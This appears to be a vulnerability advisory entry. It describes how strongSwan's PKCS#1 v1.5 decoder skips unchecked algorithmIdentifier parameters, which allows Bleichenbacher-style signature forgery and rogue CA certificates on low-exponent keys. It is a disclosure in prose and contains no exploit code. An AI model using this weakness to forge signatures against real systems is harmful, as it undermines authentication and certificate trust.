| Description |
The algorithmIdentifier structure on a PKCS#1.5 signature contains an optional parameters field. While none of the algorithms used with PKCS#1 use parameters, i.e. the field should always be encoded as ASN.1 NULL value, the strongswan decoder doesn't enforce this and simply skips over the parameters. This allows an attacker to fill the field with random data which allows to carry out a Bleichenbacher-style attack on low-exponent keys and forge signatures or create arbitrary CA certificates. |